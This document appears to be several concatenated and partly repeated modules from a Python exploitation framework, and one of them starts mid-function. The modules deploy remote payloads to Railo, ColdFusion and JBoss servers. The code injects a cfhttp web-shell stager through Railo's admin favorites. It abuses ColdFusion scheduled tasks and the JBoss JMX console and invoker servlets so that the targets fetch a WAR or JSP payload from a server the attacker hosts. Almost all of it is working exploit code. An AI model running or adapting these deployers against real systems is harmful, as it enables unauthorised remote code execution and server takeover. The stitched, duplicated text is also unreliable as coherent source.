with our web shell uri = '/railo-context/admin/web.cfm?action=internal.savedata' uri += '&action2=addfavorite&favorite=%s' % stager response = utility.requests_get(base + uri, cookies=cookie) if not response.status_code is 200: utility.Msg("Failed to deploy stager (HTTP %d)" % response.status_code, LOG.ERROR) return utility.Msg("Stager deployed, invoking...", LOG.SUCCESS) system("cp {0} {1}/{2}".format(payload_path, state.serve_dir, payload)) server_thread = Thread(target=_serve, args=("%s/%s" % (state.serve_dir, payload), )) server_thread.start() sleep(2) # invoke data_uri = "/railo-context/admin/userdata/web-%s.cfm" % session_file _ = utility.requests_get(base + data_uri) if waitServe(server_thread): utility.Msg("{0} deployed at /railo-context/{0}".format(payload), LOG.SUCCESS) killServe()
def create_task(ip, fingerprint, cfm_file, root, cookie): """ Generate a new task; all parameters are necessary, unfortunately """ base = "http://{0}:{1}".format(ip, fingerprint.port) uri = '/CFIDE/administrator/scheduler/scheduleedit.cfm' if fingerprint.version in ['5.0']: data = { "taskNameOrig": "", "TaskName": cfm_file, "StartDate": "01/01/2020", "EndDate": "", "ScheduleType": "Once", "StartTimeOnce": "13:24:05", "Interval": "Daily", "StartTimeDWM": "", "customInterval": "0", "CustomStartTime": "", "CustomEndTime": "", "Operation": "HTTPRequest", "Port": state.external_port, "ScheduledURL": "http://{0}/{1}".format(utility.local_address(), cfm_file), "Username": "", "Password": "", "RequestTimeout": "10", "ProxyServer": "", "HttpProxyPort": "23", "Publish": "1", "filePath": root, "File": cfm_file.replace('cfml', 'cfm'), "adminsubmit": "Submit+Changes" } else: data = { "TaskName": cfm_file, "Start_Date": "Jan 2, 2020", "End_Date": "", "ScheduleType": "Once", "StartTimeOnce": "13:24:50", "Interval": "Daily", "StartTimeDWM": "", "customInterval_hour": "0", "customInterval_min": "0", "customInterval_sec": "0", "CustomStartTime": "", "CustomEndTime": "", "Operation": "HTTPRequest", "ScheduledURL": "http://{0}:{1}/{2}".format(utility.local_address(), state.external_port, cfm_file), "Username": "", "Password": "", "Request_Time_out": "", "proxy_server": "", "http_proxy_port": "", "publish": "1", "publish_file": root + "\\" + cfm_file, "adminsubmit": "Submit", "taskNameOrig": "" } response = utility.requests_post(base + uri, data=data, cookies=cookie) if response.status_code == 200: return True
def deploy(fingerengine, fingerprint): """ Exploit a post-auth RCE vulnerability in Railo; uses a simple cfhttp stager to drop the payload """ payload = parse_war_path(fingerengine.options.deploy, True) payload_path = abspath(fingerengine.options.deploy) stager = ":<cfhttp method=\"get\" url=\"http://{0}:{1}/{2}\""\ " path=\"{3}\" file=\"{2}\">" base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port) cookie = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title) if not cookie: utility.Msg("Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) return utility.Msg("Fetching path...") path = fetchPath(fingerengine, fingerprint) utility.Msg("Found path %s" % path, LOG.DEBUG) # configure stager stager = quote(stager.format(utility.local_address(), state.external_port, payload, path + "\context" if fingerengine.options.remote_os \ is 'windows' else '/context')) utility.Msg("Pulling id file...") fid = fetchId(base, path, cookie) if not fid: return utility.Msg("Found id %s" % fid, LOG.DEBUG) # we've got both the security token and the security key, calculate filename session_file = md5(fid + md5(path).hexdigest()).hexdigest() utility.Msg("Session file is web-%s.cfm, attempting to inject stager..." % session_file) # trigger a new favorite with our web shell uri = '/railo-context/admin/web.cfm?action=internal.savedata' uri += '&action2=addfavorite&favorite=%s' % stager response = utility.requests_get(base + uri, cookies=cookie) if not response.status_code is 200: utility.Msg("Failed to deploy stager (HTTP %d)" % response.status_code, LOG.ERROR) return utility.Msg("Stager deployed, invoking...", LOG.SUCCESS) system("cp {0} {1}/{2}".format(payload_path, state.serve_dir, payload)) server_thread = Thread(target=_serve, args=("%s/%s" % (state.serve_dir, payload),)) server_thread.start() sleep(2) # invoke data_uri = "/railo-context/admin/userdata/web-%s.cfm" % session_file _ = utility.requests_get(base + data_uri) if waitServe(server_thread): utility.Msg("{0} deployed at /railo-context/{0}".format(payload), LOG.SUCCESS) killServe()
def deploy(fingerengine, fingerprint): """ """ war_file = abspath(fingerengine.options.deploy) war_name = parse_war_path(war_file, True) # start up the local HTTP server server_thread = Thread(target=_serve, args=(war_file, )) server_thread.start() sleep(2) # major versions of JBoss have different method indices methodIndex = { "3.0": 21, "3.2": 22, "4.0": 3, "4.2": 3, "6.0": 19, "6.1": 19 } if fingerprint.version == "3.0": # tmp = utility.capture_input("Version 3.0 has a strict WAR XML structure. " # "Ensure your WAR is compatible with 3.0 [Y/n]") # if 'n' in tmp.lower(): # return utility.Msg( "Version 3.0 has a strict WAR XML structure. Ensure your WAR is compatible with 3.0" ) utility.Msg("Preparing to deploy {0}..".format(war_file)) url = 'http://{0}:{1}/jmx-console/HtmlAdaptor'.format( fingerengine.options.ip, fingerprint.port) data = OrderedDict([ ('action', 'invokeOp'), ('name', 'jboss.system:service=MainDeployer'), ('methodIndex', methodIndex[fingerprint.version]), ('arg0', 'http://{0}:{1}/{2}'.format(utility.local_address(), state.external_port, war_name)) ]) response = utility.requests_post(url, data=data) if response.status_code == 401: utility.Msg( "Host %s:%s requires auth for JMX, checking..." % (fingerengine.options.ip, fingerprint.port), LOG.DEBUG) cookies = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title, fingerprint.version) if cookies: try: response = utility.requests_post(url, data=data, cookies=cookies[0], auth=cookies[1]) except exceptions.Timeout: # we should be fine here, so long as we get the POST request off. # Just means that we haven't gotten a response quite yet. response.status_code = 200 else: utility.Msg( "Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) return if response.status_code == 200: if waitServe(server_thread): utility.Msg( "{0} deployed to {1}".format(war_file, fingerengine.options.ip), LOG.SUCCESS) else: utility.Msg( "Failed to call {0} (HTTP {1})".format(fingerengine.options.ip, response.status_code), LOG.ERROR) killServe()
def deploy(fingerengine, fingerprint): """ This deployer attempts to deploy to the JMXInvokerServlet, often left unprotected. For versions 3.x and 4.x we can deploy WARs, but for 5.x the HttpAdaptor invoker is broken (in JBoss), so instead we invoke the DeploymentFileRepository method. This requires a JSP instead of a WAR. """ war_file = fingerengine.options.deploy war_name = war_file.rsplit("/", 1)[1] utility.Msg("Preparing to deploy {0}...".format(war_file)) url = "http://{0}:{1}/invoker/JMXInvokerServlet".format( fingerengine.options.ip, fingerprint.port) local_url = "http://{0}:8000/{1}".format(utility.local_address(), war_name) # the attached fingerprint doesnt have a version; lets pull one of the others # to fetch it. dirty hack. fp = [f for f in fingerengine.fingerprints if f.version != 'Any'] if len(fp) > 0: fp = fp[0] else: ver = utility.capture_input("Could not reliably determine version, " "please enter the remote JBoss instance" " version") if len(ver) > 0: if '.' not in ver: ver += '.0' if ver not in versions: utility.Msg("Failed to find a valid fingerprint for deployment.", LOG.ERROR) return else: fp = fingerprint fp.version = ver else: return if fp.version in ["5.0", "5.1"]: if '.war' in war_file: utility.Msg("Deploying via an exposed invoker for JBoss " " 5.x requires a JSP payload.", LOG.ERROR) return response = invkdeploy(fp.version, url, abspath(war_file)) if len(response) > 1: utility.Msg(response, LOG.DEBUG) else: utility.Msg("{0} deployed to {1}".format(war_file, fingerengine.options.ip), LOG.SUCCESS) else: # start the local HTTP server server_thread = Thread(target=_serve, args=(war_file,)) server_thread.start() # run serialization code response = invkdeploy(fp.version, url, local_url) if waitServe(server_thread): utility.Msg("{0} deployed to {1}".format(war_file, fingerengine.options.ip), LOG.SUCCESS) else: utility.Msg("JMXInvokerServlet not vulnerable", LOG.ERROR) try: get("http://localhost:8000/", timeout=1.0) except: pass
def deploy(fingerengine, fingerprint): """ This deployer attempts to deploy to the EJBInvokerServlet, often left unprotected. For versions 3.x and 4.x we can deploy WARs, but for 5.x the HttpAdaptor invoker is broken (in JBoss), so instead we invoke the DeploymentFileRepository method. This requires a JSP instead of a WAR. """ war_file = fingerengine.options.deploy war_name = war_file.rsplit("/", 1)[1] utility.Msg("Preparing to deploy {0}...".format(war_file)) url = "http://{0}:{1}/invoker/EJBInvokerServlet".format( fingerengine.options.ip, fingerprint.port) local_url = "http://{0}:8000/{1}".format(utility.local_address(), war_name) # the attached fingerprint doesnt have a version; lets pull one of the others # to fetch it. dirty hack. fp = [f for f in fingerengine.fingerprints if f.version != 'Any'] if len(fp) > 0: fp = fp[0] else: ver = utility.capture_input("Could not reliably determine version, " "please enter the remote JBoss instance" " version") if len(ver) > 0: if '.' not in ver: ver += '.0' if ver not in versions: utility.Msg( "Failed to find a valid fingerprint for deployment.", LOG.ERROR) return else: fp = fingerprint fp.version = ver else: return if fp.version in ["5.0", "5.1"]: if '.war' in war_file: utility.Msg( "Deploying via an exposed invoker for JBoss " "5.x requires a JSP payload", LOG.ERROR) return response = invkdeploy(fp.version, url, abspath(war_file)) if len(response) > 1: utility.Msg(response, LOG.DEBUG) else: utility.Msg( "{0} deployed to {1}".format(war_file, fingerengine.options.ip), LOG.SUCCESS) else: # start the local HTTP server server_thread = Thread(target=_serve, args=(war_file, )) server_thread.start() # run serialization code response = invkdeploy(fp.version, url, local_url) if response is not None: utility.Msg(response, LOG.DEBUG) if waitServe(server_thread): utility.Msg( "{0} deployed to {1}".format(war_file, fingerengine.options.ip), LOG.SUCCESS) else: utility.Msg("EJBInvokerServlet not vulnerable", LOG.ERROR) try: get("http://localhost:8000/", timeout=1.0) except: pass
def deploy(fingerengine, fingerprint): """ """ war_file = abspath(fingerengine.options.deploy) war_name = parse_war_path(war_file, True) # start up the local HTTP server server_thread = Thread(target=_serve, args=(war_file,)) server_thread.start() sleep(2) # major versions of JBoss have different method indices methodIndex = {"3.0" : 21, "3.2" : 22, "4.0" : 3, "4.2" : 3, "6.0" : 19, "6.1" : 19 } utility.Msg("Preparing to deploy {0}..".format(war_file)) url = 'http://{0}:{1}/jmx-console/HtmlAdaptor'.format( fingerengine.options.ip, fingerprint.port) data = OrderedDict([ ('action', 'invokeOp'), ('name', 'jboss.system:service=MainDeployer'), ('methodIndex', methodIndex[fingerprint.version]), ('arg0', 'http://{0}:{1}/{2}'.format( utility.local_address(), state.external_port,war_name)) ]) response = utility.requests_post(url, data=data) if response.status_code == 401: utility.Msg("Host %s:%s requires auth for JMX, checking..." % (fingerengine.options.ip, fingerprint.port), LOG.DEBUG) cookies = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title, fingerprint.version) if cookies: try: response = utility.requests_post(url, data=data, cookies=cookies[0], auth=cookies[1]) except exceptions.Timeout: # we should be fine here, so long as we get the POST request off. # Just means that we haven't gotten a response quite yet. response.status_code = 200 else: utility.Msg("Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) return if response.status_code == 200: if waitServe(server_thread): utility.Msg("{0} deployed to {1}".format(war_file, fingerengine.options.ip), LOG.SUCCESS) else: utility.Msg("Failed to call {0} (HTTP {1})".format (fingerengine.options.ip, response.status_code), LOG.ERROR) killServe()